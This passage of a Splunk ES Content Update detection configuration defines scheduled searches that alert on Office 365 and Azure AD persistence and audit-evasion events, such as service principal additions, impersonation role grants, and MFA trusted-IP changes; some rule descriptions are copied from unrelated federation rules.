["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Persistence Mechanisms", "Cloud Federated Credential Abuse"] action.risk = 1 action.risk.param._risk_message = User $user$ has created a new federation setting $modified_properties_name$ on $dest$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 18}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 18}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Add App Role Assignment Grant User - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Persistence Mechanisms", "Cloud Federated Credential Abuse"], "cis20": ["CIS 10"], "confidence": 60, "impact": 30, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003", "T1136"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is designed to detect the creation of a new Federation setting by alerting on a specific event associated with its creation. By monitoring for this event, the search can identify any instances where a Federation setting is being created within the system. This can help in detecting and monitoring any unauthorized or suspicious changes to the Federation settings, providing an additional layer of security for your environment. action.notable.param.rule_title = O365 Add App Role Assignment Grant User action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=AzureActiveDirectory Operation="Add app role assignment grant to user." | stats count min(_time) as firstTime max(_time) as lastTime values(Actor{}.ID) as Actor.ID values(Actor{}.Type) as Actor.Type values(ModifiedProperties{}.Name) as modified_properties_name by user dest ResultStatus Operation | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_add_app_role_assignment_grant_user_filter` [ESCU - O365 Added Service Principal - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects addition of new service principal accounts added to O365 tenants. Attackers can abuse service principals in Office 365 (now known as Microsoft 365) to gain unauthorized access and perform malicious actions within an organization's environment. Service principals are essentially non-human accounts used by applications, services, or scripts to access resources and interact with APIs on behalf of the organization. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003", "T1136"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects addition of new service principal accounts added to O365 tenants. Attackers can abuse service principals in Office 365 (now known as Microsoft 365) to gain unauthorized access and perform malicious actions within an organization's environment. Service principals are essentially non-human accounts used by applications, services, or scripts to access resources and interact with APIs on behalf of the organization. action.escu.how_to_implement = You must install splunk Microsoft Office 365 add-on. This search works with o365:management:activity action.escu.known_false_positives = The creation of a new Federation is not necessarily malicious, however these events need to be followed closely, as it may indicate federated credential abuse or backdoor via federated identities at a different cloud provider. action.escu.creation_date = 2023-08-02 action.escu.modification_date = 2023-08-02 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Added Service Principal - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Persistence Mechanisms", "Cloud Federated Credential Abuse", "NOBELIUM Group"] action.risk = 1 action.risk.param._risk_message = User $src_user$ has created new service principal $new_value$ in AzureActiveDirectory action.risk.param._risk = [{"risk_object_field": "src_user", "risk_object_type": "user", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Added Service Principal - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Persistence Mechanisms", "Cloud Federated Credential Abuse", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003", "T1136"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects addition of new service principal accounts added to O365 tenants. Attackers can abuse service principals in Office 365 (now known as Microsoft 365) to gain unauthorized access and perform malicious actions within an organization's environment. Service principals are essentially non-human accounts used by applications, services, or scripts to access resources and interact with APIs on behalf of the organization. action.notable.param.rule_title = O365 Added Service Principal action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=AzureActiveDirectory Operation="*Add service principal*" OR (Operation = "*principal*" AND action = "created") | stats count values(ModifiedProperties{}.NewValue) as new_value by src_user src_user_type action Operation authentication_service Workload | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_added_service_principal_filter` [ESCU - O365 Admin Consent Bypassed by Service Principal - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection targets situations where a service principal in Office 365 Azure Active Directory assigns app roles without the standard admin consent, a potential security breach. Using o365_management_activity logs, it examines the 'Add app role assignment to service principal' operation, focusing on service principals and extracting details like role ID and description. This is critical for SOCs to detect potential bypassing of crucial administrative controls, which could lead to unauthorized access or privilege escalation. A true positive implies a service principal might be misusing automated processes to assign sensitive permissions. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This detection targets situations where a service principal in Office 365 Azure Active Directory assigns app roles without the standard admin consent, a potential security breach. Using o365_management_activity logs, it examines the 'Add app role assignment to service principal' operation, focusing on service principals and extracting details like role ID and description. This is critical for SOCs to detect potential bypassing of crucial administrative controls, which could lead to unauthorized access or privilege escalation. A true positive implies a service principal might be misusing automated processes to assign sensitive permissions. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = Service Principals are sometimes configured to legitimately bypass the consent process for purposes of automation. Filter as needed. action.escu.creation_date = 2024-02-09 action.escu.modification_date = 2024-02-09 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Admin Consent Bypassed by Service Principal - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Persistence Mechanisms"] action.risk = 1 action.risk.param._risk_message = Service principal $src_user$ bypassed the admin consent process and granted permissions to $dest_user$ action.risk.param._risk = [{"risk_object_field": "src_user", "risk_object_type": "other", "risk_score": 54}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Admin Consent Bypassed by Service Principal - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Persistence Mechanisms"], "cis20": ["CIS 10"], "confidence": 60, "impact": 90, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This detection targets situations where a service principal in Office 365 Azure Active Directory assigns app roles without the standard admin consent, a potential security breach. Using o365_management_activity logs, it examines the 'Add app role assignment to service principal' operation, focusing on service principals and extracting details like role ID and description. This is critical for SOCs to detect potential bypassing of crucial administrative controls, which could lead to unauthorized access or privilege escalation. A true positive implies a service principal might be misusing automated processes to assign sensitive permissions. action.notable.param.rule_title = O365 Admin Consent Bypassed by Service Principal action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=AzureActiveDirectory Operation="Add app role assignment to service principal." | eval len=mvcount('Actor{}.ID') | eval userType = mvindex('Actor{}.ID',len-1) | eval roleId = mvindex('ModifiedProperties{}.NewValue', 0) | eval roleValue = mvindex('ModifiedProperties{}.NewValue', 1) | eval roleDescription = mvindex('ModifiedProperties{}.NewValue', 2) | eval dest_user = mvindex('Target{}.ID', 0) | search userType = "ServicePrincipal" | eval src_user = user | stats count earliest(_time) as firstTime latest(_time) as lastTime by src_user dest_user roleId roleValue roleDescription | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_admin_consent_bypassed_by_service_principal_filter` [ESCU - O365 Advanced Audit Disabled - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies instances where the O365 advanced audit is disabled for a specific user within the Office 365 tenant. It leverages O365 audit logs, specifically events related to audit license changes or modifications within the AzureActiveDirectory workloads. The O365 advanced audit provides granular logging and insights into user and administrator activities, making it a crucial tool for security monitoring and incident response. Disabling this audit for a user can blind security teams to potential malicious or unauthorized activities related to that user's mailbox or account. Attackers may disable these audits to obscure their actions and reduce the chances of detection. If an attacker successfully disables the O365 advanced audit for a user, they can operate within that user's mailbox or account with reduced risk of detection. This can lead to unauthorized data access, data exfiltration, account compromise, or other malicious activities without leaving a detailed audit trail. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562", "T1562.008"], "nist": ["DE.CM"]} action.escu.data_models = ["Change"] action.escu.eli5 = The following analytic identifies instances where the O365 advanced audit is disabled for a specific user within the Office 365 tenant. It leverages O365 audit logs, specifically events related to audit license changes or modifications within the AzureActiveDirectory workloads. The O365 advanced audit provides granular logging and insights into user and administrator activities, making it a crucial tool for security monitoring and incident response. Disabling this audit for a user can blind security teams to potential malicious or unauthorized activities related to that user's mailbox or account. Attackers may disable these audits to obscure their actions and reduce the chances of detection. If an attacker successfully disables the O365 advanced audit for a user, they can operate within that user's mailbox or account with reduced risk of detection. This can lead to unauthorized data access, data exfiltration, account compromise, or other malicious activities without leaving a detailed audit trail. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = Administrators might temporarily disable the advanced audit for troubleshooting, performance reasons, or other administrative tasks. Filter as needed. action.escu.creation_date = 2023-09-19 action.escu.modification_date = 2023-09-19 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Advanced Audit Disabled - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Persistence Mechanisms"] action.risk = 1 action.risk.param._risk_message = Advanced auditing for user $object$ was disabled by $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 32}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Advanced Audit Disabled - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Persistence Mechanisms"], "cis20": ["CIS 10"], "confidence": 80, "impact": 40, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562", "T1562.008"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies instances where the O365 advanced audit is disabled for a specific user within the Office 365 tenant. It leverages O365 audit logs, specifically events related to audit license changes or modifications within the AzureActiveDirectory workloads. The O365 advanced audit provides granular logging and insights into user and administrator activities, making it a crucial tool for security monitoring and incident response. Disabling this audit for a user can blind security teams to potential malicious or unauthorized activities related to that user's mailbox or account. Attackers may disable these audits to obscure their actions and reduce the chances of detection. If an attacker successfully disables the O365 advanced audit for a user, they can operate within that user's mailbox or account with reduced risk of detection. This can lead to unauthorized data access, data exfiltration, account compromise, or other malicious activities without leaving a detailed audit trail. action.notable.param.rule_title = O365 Advanced Audit Disabled action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Operation="Change user license." | eval property_name = mvindex ('ExtendedProperties{}.Name', 1) | search property_name = "extendedAuditEventCategory" | eval additionalDetails = mvindex('ExtendedProperties{}.Value',0) | eval split_value=split(additionalDetails, "NewValue") | eval possible_plan=mvindex(split_value, 1) | rex field="possible_plan" "DisabledPlans=\[(?P[^\]]+)\]" | search DisabledPlans IN ("*M365_ADVANCED_AUDITING*") | stats min(_time) as firstTime max(_time) as lastTime by Operation user object DisabledPlans | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_advanced_audit_disabled_filter` [ESCU - O365 Application Registration Owner Added - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies instances where a new owner is assigned to an application registration within an Azure AD and Office 365 tenant. It leverages O365 audit logs, specifically events related to changes in owner assignments within the AzureActiveDirectory workload for application registrations. Assigning a new owner to an application registration can grant significant control over the application's configuration, permissions, and behavior. An unauthorized or inadvertent change in ownership can lead to misuse of the application, potentially affecting data access, user permissions, or the application's interactions within the tenant. Monitoring for such changes ensures that only legitimate and authorized personnel have control over application registrations. If an attacker successfully assigns themselves or a compromised account as an owner to an application registration, they can modify the application's settings, permissions, and behavior. This can lead to unauthorized data access, escalation of privileges, or the introduction of malicious behavior within the application's operations action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies instances where a new owner is assigned to an application registration within an Azure AD and Office 365 tenant. It leverages O365 audit logs, specifically events related to changes in owner assignments within the AzureActiveDirectory workload for application registrations. Assigning a new owner to an application registration can grant significant control over the application's configuration, permissions, and behavior. An unauthorized or inadvertent change in ownership can lead to misuse of the application, potentially affecting data access, user permissions, or the application's interactions within the tenant. Monitoring for such changes ensures that only legitimate and authorized personnel have control over application registrations. If an attacker successfully assigns themselves or a compromised account as an owner to an application registration, they can modify the application's settings, permissions, and behavior. This can lead to unauthorized data access, escalation of privileges, or the introduction of malicious behavior within the application's operations action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = Application owners may be added for legitimate reasons, filter as needed. action.escu.creation_date = 2023-09-07 action.escu.modification_date = 2023-09-07 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Application Registration Owner Added - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Persistence Mechanisms", "NOBELIUM Group"] action.risk = 1 action.risk.param._risk_message = Application registration $app_displayName$ was assigned a new owner $object$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 30}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Application Registration Owner Added - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Persistence Mechanisms", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 50, "impact": 60, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies instances where a new owner is assigned to an application registration within an Azure AD and Office 365 tenant. It leverages O365 audit logs, specifically events related to changes in owner assignments within the AzureActiveDirectory workload for application registrations. Assigning a new owner to an application registration can grant significant control over the application's configuration, permissions, and behavior. An unauthorized or inadvertent change in ownership can lead to misuse of the application, potentially affecting data access, user permissions, or the application's interactions within the tenant. Monitoring for such changes ensures that only legitimate and authorized personnel have control over application registrations. If an attacker successfully assigns themselves or a compromised account as an owner to an application registration, they can modify the application's settings, permissions, and behavior. This can lead to unauthorized data access, escalation of privileges, or the introduction of malicious behavior within the application's operations action.notable.param.rule_title = O365 Application Registration Owner Added action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=AzureActiveDirectory Operation="Add owner to application." | eval app_id=mvindex('ModifiedProperties{}.NewValue', 0) | eval app_displayName=mvindex('ModifiedProperties{}.NewValue', 1) | stats max(_time) as lastTime values(ModifiedProperties{}.NewValue) by Operation, user, app_displayName, object | `security_content_ctime(lastTime)` | `o365_application_registration_owner_added_filter` [ESCU - O365 ApplicationImpersonation Role Assigned - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the assignment of the ApplicationImpersonation role in Office 365, either to a user or an application. This analytic leverages the Office 365 Management Activity API, specifically monitoring for events related to role assignments and changes within the Azure Active Directory audit logs. The ApplicationImpersonation role allows a security principal to impersonate any user within the organization and perform actions on their behalf, such as accessing or modifying their mailbox. This role, if misused or granted inappropriately, can pose a significant security risk. Monitoring the assignment of this role is crucial as it can be an indicator of potential malicious activity or misconfigurations. If an attacker successfully assigns the ApplicationImpersonation role to a malicious user or application, they can gain the ability to impersonate any user within the organization. This can lead to unauthorized access to sensitive information, manipulation of mailbox data, and other malicious actions. The attacker can effectively masquerade as a legitimate user, making their actions harder to detect and potentially causing significant harm to the organization. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.002"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the assignment of the ApplicationImpersonation role in Office 365, either to a user or an application. This analytic leverages the Office 365 Management Activity API, specifically monitoring for events related to role assignments and changes within the Azure Active Directory audit logs. The ApplicationImpersonation role allows a security principal to impersonate any user within the organization and perform actions on their behalf, such as accessing or modifying their mailbox. This role, if misused or granted inappropriately, can pose a significant security risk. Monitoring the assignment of this role is crucial as it can be an indicator of potential malicious activity or misconfigurations. If an attacker successfully assigns the ApplicationImpersonation role to a malicious user or application, they can gain the ability to impersonate any user within the organization. This can lead to unauthorized access to sensitive information, manipulation of mailbox data, and other malicious actions. The attacker can effectively masquerade as a legitimate user, making their actions harder to detect and potentially causing significant harm to the organization. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = While infrequent, the ApplicationImpersonation role may be granted for leigimate reasons, filter as needed. action.escu.creation_date = 2023-10-17 action.escu.modification_date = 2023-10-17 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 ApplicationImpersonation Role Assigned - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Persistence Mechanisms", "Office 365 Collection Techniques", "NOBELIUM Group"] action.risk = 1 action.risk.param._risk_message = $user$ granted the ApplicationImpersonation role to $target_user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 ApplicationImpersonation Role Assigned - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Persistence Mechanisms", "Office 365 Collection Techniques", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 70, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the assignment of the ApplicationImpersonation role in Office 365, either to a user or an application. This analytic leverages the Office 365 Management Activity API, specifically monitoring for events related to role assignments and changes within the Azure Active Directory audit logs. The ApplicationImpersonation role allows a security principal to impersonate any user within the organization and perform actions on their behalf, such as accessing or modifying their mailbox. This role, if misused or granted inappropriately, can pose a significant security risk. Monitoring the assignment of this role is crucial as it can be an indicator of potential malicious activity or misconfigurations. If an attacker successfully assigns the ApplicationImpersonation role to a malicious user or application, they can gain the ability to impersonate any user within the organization. This can lead to unauthorized access to sensitive information, manipulation of mailbox data, and other malicious actions. The attacker can effectively masquerade as a legitimate user, making their actions harder to detect and potentially causing significant harm to the organization. action.notable.param.rule_title = O365 ApplicationImpersonation Role Assigned action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=Exchange Operation="New-ManagementRoleAssignment" Role=ApplicationImpersonation | rename User as target_user | stats max(_time) as lastTime by Operation, user, object, ObjectId, Role, target_user | `security_content_ctime(lastTime)` | `o365_applicationimpersonation_role_assigned_filter` [ESCU - O365 Block User Consent For Risky Apps Disabled - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic detects when the "risk-based step-up consent" security setting in Microsoft 365 is disabled. This setting, when enabled, prevents regular users from granting consent to potentially malicious OAuth applications, requiring an administrative "step-up" for consent instead. Disabling this feature could expose the organization to OAuth phishing threats.The detection operates by monitoring Azure Active Directory logs for events where the "Update authorization policy" operation is performed. It specifically looks for changes to the "AllowUserConsentForRiskyApps" setting, identifying instances where this setting is switched to "true," effectively disabling the risk-based step-up consent. Monitoring for changes to critical security settings like the "risk-based step-up consent" is vital for maintaining the integrity of an organization's security posture. Disabling this feature can make the environment more susceptible to OAuth phishing attacks, where attackers trick users into granting permissions to malicious applications. Identifying when this setting is disabled can help blue teams to quickly respond, investigate, and potentially uncover targeted phishing campaigns against their users. If an attacker successfully disables the "risk-based step-up consent" and subsequently launches an OAuth phishing campaign, they could gain unauthorized access to user data and other sensitive information within the M365 environment. This could lead to data breaches, unauthorized access to emails, and potentially further compromise within the organization. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562"], "nist": ["DE.CM"]} action.escu.data_models = ["Risk"] action.escu.eli5 = This analytic detects when the "risk-based step-up consent" security setting in Microsoft 365 is disabled. This setting, when enabled, prevents regular users from granting consent to potentially malicious OAuth applications, requiring an administrative "step-up" for consent instead. Disabling this feature could expose the organization to OAuth phishing threats.The detection operates by monitoring Azure Active Directory logs for events where the "Update authorization policy" operation is performed. It specifically looks for changes to the "AllowUserConsentForRiskyApps" setting, identifying instances where this setting is switched to "true," effectively disabling the risk-based step-up consent. Monitoring for changes to critical security settings like the "risk-based step-up consent" is vital for maintaining the integrity of an organization's security posture. Disabling this feature can make the environment more susceptible to OAuth phishing attacks, where attackers trick users into granting permissions to malicious applications. Identifying when this setting is disabled can help blue teams to quickly respond, investigate, and potentially uncover targeted phishing campaigns against their users. If an attacker successfully disables the "risk-based step-up consent" and subsequently launches an OAuth phishing campaign, they could gain unauthorized access to user data and other sensitive information within the M365 environment. This could lead to data breaches, unauthorized access to emails, and potentially further compromise within the organization. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = Legitimate changes to the 'risk-based step-up consent' setting by administrators, perhaps as part of a policy update or security assessment, may trigger this alert, necessitating verification of the change's intent and authorization. action.escu.creation_date = 2023-10-26 action.escu.modification_date = 2023-10-26 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Block User Consent For Risky Apps Disabled - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Account Takeover"] action.risk = 1 action.risk.param._risk_message = Risk-based step-up consent security setting was disabled by $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 30}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Block User Consent For Risky Apps Disabled - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Account Takeover"], "cis20": ["CIS 10"], "confidence": 50, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic detects when the "risk-based step-up consent" security setting in Microsoft 365 is disabled. This setting, when enabled, prevents regular users from granting consent to potentially malicious OAuth applications, requiring an administrative "step-up" for consent instead. Disabling this feature could expose the organization to OAuth phishing threats.The detection operates by monitoring Azure Active Directory logs for events where the "Update authorization policy" operation is performed. It specifically looks for changes to the "AllowUserConsentForRiskyApps" setting, identifying instances where this setting is switched to "true," effectively disabling the risk-based step-up consent. Monitoring for changes to critical security settings like the "risk-based step-up consent" is vital for maintaining the integrity of an organization's security posture. Disabling this feature can make the environment more susceptible to OAuth phishing attacks, where attackers trick users into granting permissions to malicious applications. Identifying when this setting is disabled can help blue teams to quickly respond, investigate, and potentially uncover targeted phishing campaigns against their users. If an attacker successfully disables the "risk-based step-up consent" and subsequently launches an OAuth phishing campaign, they could gain unauthorized access to user data and other sensitive information within the M365 environment. This could lead to data breaches, unauthorized access to emails, and potentially further compromise within the organization. action.notable.param.rule_title = O365 Block User Consent For Risky Apps Disabled action.notable.param.security_domain = audit action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=AzureActiveDirectory Operation="Update authorization policy." | eval index_number = if(mvfind('ModifiedProperties{}.Name', "AllowUserConsentForRiskyApps") >= 0, mvfind('ModifiedProperties{}.Name', "AllowUserConsentForRiskyApps"), -1) | search index_number >= 0 | eval AllowUserConsentForRiskyApps = mvindex('ModifiedProperties{}.NewValue',index_number) | where AllowUserConsentForRiskyApps like "%true%" | stats count min(_time) as firstTime max(_time) as lastTime by user, Operation, AllowUserConsentForRiskyApps, user_agent | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_block_user_consent_for_risky_apps_disabled_filter` [ESCU - O365 Bypass MFA via Trusted IP - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies instances where new IP addresses are added to the trusted IPs list in Office 365, potentially allowing users from these IPs to bypass Multi-Factor Authentication (MFA) during login. The detection leverages O365 audit logs, specifically focusing on events related to the modification of trusted IP settings. By monitoring these logs, the analytic captures and alerts on any addition of new trusted IPs. Adding trusted IPs to bypass MFA is a significant security concern. While there might be legitimate reasons to add trusted IPs, such as for a new office location, there's also a risk of attackers or malicious insiders using this to facilitate unauthorized access. Monitoring for changes to the trusted IP list helps ensure that any attempt to bypass MFA is legitimate and authorized. If the detection is a true positive, it suggests that users logging in from the newly added trusted IP can bypass MFA, potentially weakening the security posture of the organization. This could lead to unauthorized access, especially if the IP was added maliciously. Immediate investigation is required to validate the legitimacy of the IP addition and to assess potential security implications. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.007", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = ["Authentication"] action.escu.eli5 = This analytic identifies instances where new IP addresses are added to the trusted IPs list in Office 365, potentially allowing users from these IPs to bypass Multi-Factor Authentication (MFA) during login. The detection leverages O365 audit logs, specifically focusing on events related to the modification of trusted IP settings. By monitoring these logs, the analytic captures and alerts on any addition of new trusted IPs. Adding trusted IPs to bypass MFA is a significant security concern. While there might be legitimate reasons to add trusted IPs, such as for a new office location, there's also a risk of attackers or malicious insiders using this to facilitate unauthorized access. Monitoring for changes to the trusted IP list helps ensure that any attempt to bypass MFA is legitimate and authorized. If the detection is a true positive, it suggests that users logging in from the newly added trusted IP can bypass MFA, potentially weakening the security posture of the organization. This could lead to unauthorized access, especially if the IP was added maliciously. Immediate investigation is required to validate the legitimacy of the IP addition and to assess potential security implications. action.escu.how_to_implement = You must install Splunk Microsoft Office 365 add-on. This search works with o365:management:activity action.escu.known_false_positives = Unless it is a special case, it is uncommon to continually update Trusted IPs to MFA configuration. action.escu.creation_date = 2022-02-03 action.escu.modification_date = 2022-02-03 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Bypass MFA via Trusted IP - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Persistence Mechanisms"] action.risk = 1 action.risk.param._risk_message = User $user_id$ has added new IP addresses $ip_addresses_new_added$ to a list of trusted IPs to bypass MFA action.risk.param._risk = [{"threat_object_field": "ip_addresses_new_added", "threat_object_type": "ip_address"}, {"risk_object_field": "user_id", "risk_object_type": "other", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Bypass MFA via Trusted IP - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Persistence Mechanisms"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.007", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies instances where new IP addresses are added to the trusted IPs list in Office 365, potentially allowing users from these IPs to bypass 